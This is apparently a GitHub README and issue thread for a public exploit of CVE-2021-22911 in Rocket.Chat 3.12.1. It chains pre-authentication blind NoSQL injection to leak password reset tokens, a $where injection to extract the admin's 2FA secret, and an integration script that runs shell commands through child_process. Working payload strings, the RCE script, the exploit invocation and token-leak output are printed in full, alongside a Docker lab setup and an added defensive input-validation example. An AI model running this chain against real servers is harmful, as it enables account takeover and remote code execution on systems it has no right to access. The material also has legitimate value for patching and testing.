Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

Overview

CVE-2021-22911

  • The getPasswordPolicy method is vulnerable to NoSQL injection attacks and does not require authentication/authorization. It can be used to take over accounts by leaking password reset tokens. Taking over an admin account leads to Remote Code Execution.

Explanation

  1. Hijacking a user's account ( Unauthenticated )
  • The getPasswordPolicy endpoint is vulnerable to NoSQL injection through the password reset token parameter. The parameter accepts a JSON object, which lets us use the $regex operator, and we use that to perform a blind NoSQL injection and recover the reset token.
  2. Privilege Escalation to admin ( Authenticated )
  • The admin user is most likely protected by 2FA, so even if we change the admin's password through (1), login will prompt for a 2FA code.
  • The users.list API endpoint takes a query parameter which is vulnerable to NoSQL injection. We are also able to retrieve data by throwing an error.
  • We run the following query to get the admin's 2FA secret : {"$where":"this.username==='admin'+&&+(()=>{+throw+this.services.totp.secret+})()"}
  • Next we just do (1) to reset the admin's password and use the 2FA secret to generate a code which we can use to log in.
  3. RCE ( Authenticated - Admin )
  • Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered.
  • We create an integration with the following script :
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('command here');
  • Next we just trigger the webhook to get RCE :)
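As an added, defensive illustration that is not part of this README or of Rocket.Chat's own code: the input checks whose absence steps (1) and (2) above rely on. A reset token must be a plain string before it reaches a query, and a caller-supplied query object must not carry MongoDB operator keys such as $regex or $where at any depth. The field path services.password.reset.token is assumed here for illustration.

```javascript
// Added example (not Rocket.Chat's code): the validation that a token-keyed
// lookup and a user-supplied query need before being passed to MongoDB.

// A password reset token must be a primitive string; a JSON object in its
// place is what lets operators such as $regex into the selector.
function isPlainString(value) {
  return typeof value === 'string';
}

// Walk a JSON-decoded value and return the dotted path of the first key that
// starts with '$' (a MongoDB operator) at any depth, or null if none exists.
function findOperatorKey(value, path = '') {
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findOperatorKey(value[i], `${path}[${i}]`);
      if (hit) return hit;
    }
    return null;
  }
  if (value && typeof value === 'object') {
    for (const key of Object.keys(value)) {
      const here = path ? `${path}.${key}` : key;
      if (key.startsWith('$')) return here;
      const hit = findOperatorKey(value[key], here);
      if (hit) return hit;
    }
  }
  return null;
}

// Hardened token lookup: only a string token is ever placed in the selector.
// The field path is assumed for illustration.
function buildTokenSelector(token) {
  if (!isPlainString(token)) {
    throw new TypeError('reset token must be a string, got ' + typeof token);
  }
  return { 'services.password.reset.token': token };
}

// Hardened query acceptance: refuse any object that carries an operator key,
// so neither $regex (blind extraction) nor $where (error-based leak) gets through.
function validateQuery(query) {
  const bad = findOperatorKey(query);
  if (bad) throw new Error('operator not allowed in query: ' + bad);
  return query;
}
```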

Usage

  • You will need the email of a low-privileged user who has no 2FA set up. ( -u )
  • You will also need to know the administrator's email. It is not a problem if the admin is protected with 2FA. ( -a )
python3 exploit.py -u "[email protected]" -a "[email protected]" -t "http://rocket.local"

Environment

  • Tested on Rocket Chat 3.12.1
  • To build your own test environment using Docker :
docker run --name db -d mongo:3.6 --smallfiles --replSet rs0 --oplogSize 128
docker exec -ti db mongo --eval "printjson(rs.initiate())"
docker run --name rocketchat -p 80:3000 --link db --env ROOT_URL=http://localhost --env MONGO_OPLOG_URL=mongodb://db:27017/local -d rocket.chat:3.12.1

Credits

Exploit-db

  • Coming soon
Comments
  • is section Environment complete?

    I tried to check your exploit.

    As said in the Environment section of the Readme, I built the test environment with

    docker run --name db -d mongo:3.6 --smallfiles --replSet rs0 --oplogSize 128
    docker exec -ti db mongo --eval "printjson(rs.initiate())"
    docker run --name rocketchat -p 80:3000 --link db --env ROOT_URL=http://localhost --env MONGO_OPLOG_URL=mongodb://db:27017/local -d rocket.chat:3.12.1
    

    after that, execute script as

    python3 exploit.py -u "[email protected]" -a "[email protected]" -t "http://localhost:80"
    

    script ended with

    [+] Resetting [email protected] password
    [+] Password Reset Email Sent
    Got: U
    Got: UN
    Got: UNU
    Got: UNUg
    Got: UNUg2
    Got: UNUg2f
    Got: UNUg2fJ
    Got: UNUg2fJ-
    Got: UNUg2fJ-I
    Got: UNUg2fJ-IE
    Got: UNUg2fJ-IE6
    Got: UNUg2fJ-IE6P
    Got: UNUg2fJ-IE6Pt
    Got: UNUg2fJ-IE6Ptc
    Got: UNUg2fJ-IE6Ptco
    Got: UNUg2fJ-IE6PtcoK
    Got: UNUg2fJ-IE6PtcoKd
    Got: UNUg2fJ-IE6PtcoKdN
    Got: UNUg2fJ-IE6PtcoKdNP
    Got: UNUg2fJ-IE6PtcoKdNPm
    Got: UNUg2fJ-IE6PtcoKdNPmg
    Got: UNUg2fJ-IE6PtcoKdNPmg1
    Got: UNUg2fJ-IE6PtcoKdNPmg1K
    Got: UNUg2fJ-IE6PtcoKdNPmg1Kv
    Got: UNUg2fJ-IE6PtcoKdNPmg1Kvl
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlX
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXw
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-c
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ce
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceY
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYN
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNU
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUy
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyG
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGf
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfR
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJ
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJL
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLI
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr
    Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr7
    [+] Got token : UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr7
    [-] Wrong token
    

    Do I understand correctly that the problem is that I didn't fill the Rocket Chat database with users?

    Could you add the necessary comments to the Environment section to fully recreate the exploitation?

    p.s. I'm sorry for being a dummy xd

    p.p.s. and great work btw

    opened by RegularITCat 2
  • For RocketChat v3.2.2: Class "Script" not in Trigger rce

    Here is the response I get from the terminal after running the exploit:

    {"success":false}

    The integration appears in the integrations list in my admin panel.

    This appears in the admin log:

    server.js:204 Integrations ➔ Incoming WebHook.error [Class "Script" not in Trigger rce ]

    Is there a way to get this working for earlier versions of RocketChat? (I tried connecting over Discord as well.)

    opened by MisterVermont13 1
  • binascii.Error: Non-base32 digit found

    Trying to run this POC in a test environment with Rocket Chat, and I keep running into the issue below when the script receives the password reset token for the admin account

    [+] Got token : j3ldATrC6nBzTVg4rr_JAgDGCta36nt8fFIF6-wxHYX
    Traceback (most recent call last):
      File "/Tools/CVE-2021-22911/exploit.py", line 155, in <module>
        code = oathtool.generate_otp(secret)
      File "/usr/local/lib/python3.9/dist-packages/oathtool/__init__.py", line 59, in generate_otp
        key = base64.b32decode(pad(clean(key)), casefold=True)
      File "/usr/lib/python3.9/base64.py", line 231, in b32decode
        raise binascii.Error('Non-base32 digit found') from None
    binascii.Error: Non-base32 digit found

    Is there something I'm missing, or not understanding with this error? Or is there an issue with the exploit code?

    opened by ashishgajjar90 3
Owner
Enox
My discord : Enox#4458